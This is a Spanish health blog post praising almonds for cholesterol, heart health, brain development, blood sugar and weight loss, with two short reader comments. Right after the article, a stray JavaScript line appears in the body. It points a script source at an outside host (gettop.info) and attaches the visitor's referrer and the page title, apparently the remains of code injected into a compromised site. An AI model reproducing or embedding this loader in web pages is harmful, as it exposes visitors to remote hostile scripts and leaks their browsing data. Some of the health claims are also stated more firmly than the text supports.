Salud y belleza » Alimentación, Salud, alimentos, dieta saludable

Las almendras, un gran aliado para tu organismo

2 Comentarios

almendras-saludablesLas almendras son de los frutos secos más beneficiosos para nuestro organismo por los nutrientes que contienen. Se trata de un alimento, por tanto, muy nutritivo que contiene importantes cantidades de hierro, magnesio, calcio, fósforo o vitamina E, entre otros. Por eso vamos a exponerte los diferentes beneficios que pueden tener las almendras para tu salud y tu organismo para que los aproveches mucho más.

En primer lugar, los médicos recomiendan comer almendras porque ayudan a controlar el colesterol. Éstas ayudan a subir el nivel de lipoproteínas de alta densidad y reducen las de baja densidad, lo que hace que se regule el nivel de colesterol en sangre.

almendras-corazonLas almendras también funcionan muy bien como antioxidantes naturales por su alto contenido en vitamina E. De este modo se reducen los riesgos de padecer enfermedades del corazón. El magnesio de las almendras también es bueno para la salud cardiovascular.

Por otro lado, los expertos aseguran que el consumo habitual de almendras aporta muchos beneficios al desarrollo del cerebro y propicia un alto rendimiento intelectual. Por ello es importante que los niños consuman almendras durante el crecimiento.

Este fruto seco también ayuda al cuidado de la piel y del cabello, por eso hay tantos productos para el lavado y cuidado de la piel y el cabello que contienen aceite de almendras. Date masajes con estos aceites habitualmente y notarás una mejora en la salud de tu piel.

almendras-belleza

Se recomienda también el consumo de almendras para diabéticos, ya que sus propiedades ayudan a reducir los niveles de azúcar en sangre, así que es muy recomendable tomar almendras después de las comidas.

En una dieta sana y equilibrada no pueden faltar las almendras que ayudan a reducir peso, calman el apetito y, al ser ricos en fibra, son un remedio perfecto contra el estreñimiento. Eso sí, asegúrate de beber suficiente agua después de comer almendras.

¿Comes almendras habitualmente? ¿Conocías sus beneficios?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , , ,

2 Comments »

  • Amaya said:

    pero si las almendras engordan un montón!!! Los frutos secos son mi perdición pero me es imposible comerlos porque engordan

  • yasmine said:

    están buenísimas. le suelo echar almendras troceadas a casi todo :)

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.